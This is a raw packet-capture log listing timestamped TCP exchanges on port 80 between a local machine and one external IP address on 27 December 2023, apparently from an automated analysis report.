Dec 27, 2023 18:12:25.009260893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.009264946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.009273052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.009277105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.009285927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.009296894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.009304047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.009308100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.009330034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.009345055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.009356976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.009357929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.009367943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.009378910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.009388924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.009390116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.009418011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.010940075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.010952950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.010963917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.010992050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011019945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011068106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011080027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011091948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011102915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011116982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011148930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011213064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011224985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011235952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011246920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011250973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011259079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011271000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011281013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011288881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011292934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011303902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011316061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011317968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011327028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011338949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011341095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011349916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011353970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011363029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011378050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011389971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011398077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011401892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011414051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011415005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011425972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011430979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011439085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011464119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011487961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011490107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011502028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011512995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011523962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011535883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011547089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011550903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011559010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011569977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011584044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011585951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011599064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011609077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011610031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011620998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011631966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011642933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011643887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011653900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011663914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011672974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011676073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011687040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011692047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011698961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011707067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011709929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011720896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011727095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011734009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011744976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.011758089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.011785030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.012166023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.012275934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.012289047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.012300014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.012310982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.012317896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.012322903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.012335062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.012341976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.012346983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.012357950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.012358904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.012381077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.012404919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.013089895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.013102055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.013113022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.013123989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.013134956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.013144970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.013176918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.013614893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.013649940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.013741016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.013752937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.013763905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.013775110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.013793945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.013799906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.013811111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.013844967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.013856888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.013868093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.013886929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.013912916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.014487982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.014553070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.014564991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.014575958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.014588118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.014589071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.014625072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.014658928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.014672995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.014683962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.014695883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.014697075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.014714003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.015306950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.015341997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.015345097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.015366077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.015377045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.015394926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.015408039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.015415907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.015441895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.015466928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.015479088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.015491009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.015511990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.015528917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.016216040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.016231060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.016248941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.016261101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.016271114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.016283035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.016283035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.016294956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.016316891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.016449928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.016463041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.016484022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.017045975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.017081022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.017118931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.017124891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.017152071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.017206907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.017273903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.017322063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.017333984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.017360926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.017378092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.017383099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.017407894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.018038034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.018084049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.018095970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.018106937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.018119097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.018130064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.018151999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.018476009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.018589973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.018601894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.018613100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.018624067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.018634081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.018635988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.018647909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.018660069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.018673897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.018682957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.018703938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.018727064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.019422054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.019491911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.019505024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.019520998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.019532919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.019541025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.019556999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.019570112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.019571066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.019589901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.019593000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.019603968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.019623995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.020267010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.020303965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.020317078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.020349979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.020379066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.020406961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.020418882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.020430088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.020442963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.020454884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.020457983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.020467043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.020486116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.020509005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.021188021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.021200895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.021213055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.021241903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.021294117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.021306038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.021317005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.021328926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.021348000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.021359921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.021362066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.021373034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.021393061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.021987915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.022034883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.022042990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.022058010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.022068977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.022092104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.022103071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.022104979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.022129059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.022181988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.022214890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.022233963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.022247076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.022262096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.022291899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.023072004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.023086071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.023097992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.023109913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.023116112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.023144007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.023479939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.023493052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.023504019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.023515940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.023541927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.023607969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.023619890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.023631096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.023642063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.023653984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.023663998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.023665905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.023679018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.023690939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.023710966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.024396896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.024409056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.024430037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.024435043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.024441957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.024463892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.024470091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.024477959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.024496078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.024548054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.024560928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.024571896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.024580002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.024584055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.024605036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.025384903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.025398016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.025409937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.025435925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.025450945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.025463104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.025466919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.025474072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.025485039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.025489092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.025496960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.025509119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.025516987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.025521040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.025548935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.026288986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.026326895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.026336908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.026456118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.026467085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.026478052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.026489973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.026500940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.026504040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.026513100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.026524067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.026527882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.026536942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.026542902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.026557922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.027328014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.027340889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.027352095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.027364016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.027384996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.027393103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.027405024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.027416945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.027432919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.027435064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.027445078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.027456045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.027460098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.027484894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.028304100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.028316021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.028326988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.028338909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.028352022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.028376102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.028382063 CET	49738	80	192.168.2.4	5.42.65.125
